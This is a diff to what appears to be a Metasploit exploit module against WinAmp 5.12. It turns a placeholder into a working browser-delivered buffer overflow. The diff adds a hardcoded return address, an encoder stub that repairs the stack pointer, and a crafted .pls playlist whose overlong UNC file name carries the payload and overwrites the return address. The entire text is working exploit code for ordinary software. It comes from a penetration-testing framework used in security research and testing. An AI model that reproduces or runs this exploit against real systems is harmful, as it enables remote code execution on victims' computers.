diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index 3584fd377a..11c8f5fb43 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -26,7 +26,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread', + 'EXITFUNC' => 'process', }, 'Payload' => { @@ -36,11 +36,19 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote { 'ConnectionType' => '-find', }, + + # Landing on \x5c\x5c trashes esp, restore from ecx + 'PrependEncoder' => "\x87\xe1", + + # Dont need them, dont want them, preserve esi + 'DisableNops' => true, + }, 'Platform' => 'win', 'Targets' => [ - [ 'WinAmp 5.12', { }], + # Return to exe, but don't clobber ecx, 0x0d is replaced by 0x00 + [ 'WinAmp 5.12', { 'Ret' => 0x0d45fece }], ], 'DisclosureDate' => 'Jan 29 2006', 'DefaultTarget' => 0)) @@ -54,10 +62,12 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote if (not request.uri.match(/\.pls$/i)) html = - "" + - "One second please..." + "One second please..." send_response(cli, html) return end @@ -73,11 +83,15 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote def generate_playlist(payload) - file = Rex::Text.pattern_create(2048) + name = "The Metasploit(TM) Theme Song" + file = Rex::Text.rand_text_english(1026) + file[1022 , 4] = [target.ret].pack('V') + file[0, payload.encoded.length] = payload.encoded + play = "[playlist]\r\n" + - "File1=\\\\" + file + "\r\n" + - "Title1=~BOF~\r\n" + + "File1=\\\\#{file}\r\n" + + "Title1=#{name}\r\n" + "Length1=FFF\r\n" + "NumberOfEntries=1\r\n" + "Version=2\r\n"